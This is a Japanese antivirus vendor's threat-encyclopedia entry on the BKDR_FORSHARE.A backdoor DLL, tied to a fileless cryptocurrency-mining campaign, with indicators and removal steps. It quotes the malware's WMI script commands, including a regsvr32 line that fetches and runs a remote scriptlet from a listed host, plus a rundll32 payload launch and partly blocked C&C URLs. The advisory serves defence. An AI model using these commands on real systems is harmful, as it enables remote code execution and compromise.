Skip to content

お住まいの国は?:
Threat Encyclopedia Mobile Page
クイックリンク
BKDR_FORSHARE.A

トレンドマイクロは、このマルウェアをNoteworthy(要注意)に分類しました。

このマルウェアは、2017年7月後半に発見された、ファイルレス活動機能を備える仮想通貨発掘マルウェア「TROJ 64 COINMINER.QO」に関連しています。

マルウェアは、不正リモートユーザからのコマンドを実行し、感染コンピュータを改ざんします。 ただし、情報公開日現在、このWebサイトにはアクセスできません。


ファイルサイズ: 83,459 bytes
タイプ: DLL
メモリ常駐: あり
発見日: 2017年8月3日
ペイロード: URLまたはIPアドレスに接続, ファイルのダウンロード, プロセスの強制終了

バックドア活動

マルウェアは、不正リモートユーザからの以下のコマンドを実行します。

  • Terminate running processes
  • Download and execute files

マルウェアは、以下のWebサイトにアクセスし、不正リモートユーザからのコマンドを送受信します。

  • http://down.{BLOCKED}g.info:8888/ok.txt

ただし、情報公開日現在、このWebサイトにはアクセスできません。

ダウンロード活動

マルウェアは、以下のファイル名でダウンロードしたファイルを保存します。

  • %Windows%\debug\c.bat

(註:%Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)

その他

マルウェアは、WMIクラスにスクリプトをインストールして実行します。このスクリプトは「JS_COINMINER.QO」として検出されます。

このスクリプトは次のコマンドを実行します。

  • regsvr32 /s shell32.dll
  • regsvr32 /s WSHom.Ocx
  • regsvr32 /s scrrun.dll
  • regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll
  • regsvr32 /s jscript.dll
  • regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll
  • rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa

このスクリプトは、次のコマンド&コントロール(C&C)サーバに接続して、終了するプロセスのチェックリストを取得します。

  • http://wmi.<省略>s.top:8888/kill.html

マルウェアは、不正リモートユーザからの以下のコマンドを実行します。

  • ファイルのダウンロードおよび実行
  • 実行中のプロセスの終了

対応検索エンジン: 9.850
初回 VSAPI パターンバージョン: 13.572.08
初回 VSAPI パターンリリース日: 2017年8月4日
VSAPI OPR パターンバージョン: 13.573.00
VSAPI OPR パターンリリース日:2017年8月5日

手順 1

Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「BKDR_FORSHARE.A」と検出したファイルの駆除を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください。
解析者 : Nikko Tamana